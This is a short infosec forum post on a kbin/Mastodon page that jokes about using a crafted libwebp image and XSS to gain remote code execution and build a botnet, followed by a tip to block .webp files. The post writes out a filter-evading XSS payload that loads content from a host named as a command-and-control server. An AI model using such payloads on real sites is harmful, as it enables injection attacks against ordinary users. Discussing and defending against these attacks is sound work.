I'm usually a grey hat but my evil brain commands me to insert that crafted webp... - Infosec

rceninja, 8 months ago

I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol

Prevention : add .webp extention to ublock origin custom rules or on the whole DNS level.

#infosec #cybersecurity #tip #mastodon #security #oscp

reply

report

activity

copy /kbin url

copy original url

open original url

Loading...

+ simonzerafa

Image

Image alternative text

Federation

Status:

On | Off

Instances:

/m/infosec

Threads (1435)

Microblog (3173)

All Content

People

Magazines

Collections

Thread

rceninja

@rceninja@infosec.exchange

Added: 8 months ago
Online: -
Boosts: 1

Magazine

Infosec

@infosec@kbin.social

This magazine is dedicated to discussions on cybersecurity, network security, and information security.

Whether you are an IT professional, a cybersecurity enthusiast, or simply concerned about online privacy and security, this is the place for you.

Here you can share your knowledge, ask for advice, and discuss the latest news and trends in the world of cybersecurity. From encryption and malware to risk management and digital forensics, this category covers a wide range of topics related to information security.

Join the conversation and let's work together to keep our online world safe and secure.

Created: 1 year ago
Owner: ernest
Subscribers: 3668
Online: -

Moderators

ernest

Active people

Pegasus: Putin-kritische Journalisten in der EU mit Spyware angegriffen...

6 days ago to Cybersecurity

FlyingYeti APT Serves Up Cookbox Malware Using WinRAR https://www.darkreading.com/cyberattacks-data-breaches/flyingyeti-apt-cookbox-malware-winrar?utm_source=dlvr.it&utm_medium=mastodon...

6 days ago to Cybersecurity

We're looking for a junior web developer in Rust or Python. This opening is ideal for mid-career folks transitioning to infosec (including bootcamp grads), someone looking for an entry-level role, or as an internship....

8 days ago to Cybersecurity

I’m very close to finishing my personal laptop which is using @QubesOS on my @purism Librem 14. I just have to rotate passwords and setup my @bitwarden and @protonprivacy email and password manager. I even have @yubico for most of my TOTP. Need to sync Monero, login to...

8 days ago to random

Related threads

University of Michigan employee, student data stolen in cyberattack

7 months ago to sysadmin

David Attenborough narrates a cyber attack

7 months ago to InfoSecMemes

Pretender: Your MitM sidekick for relaying attacks

1 year ago to toolsec

Add comment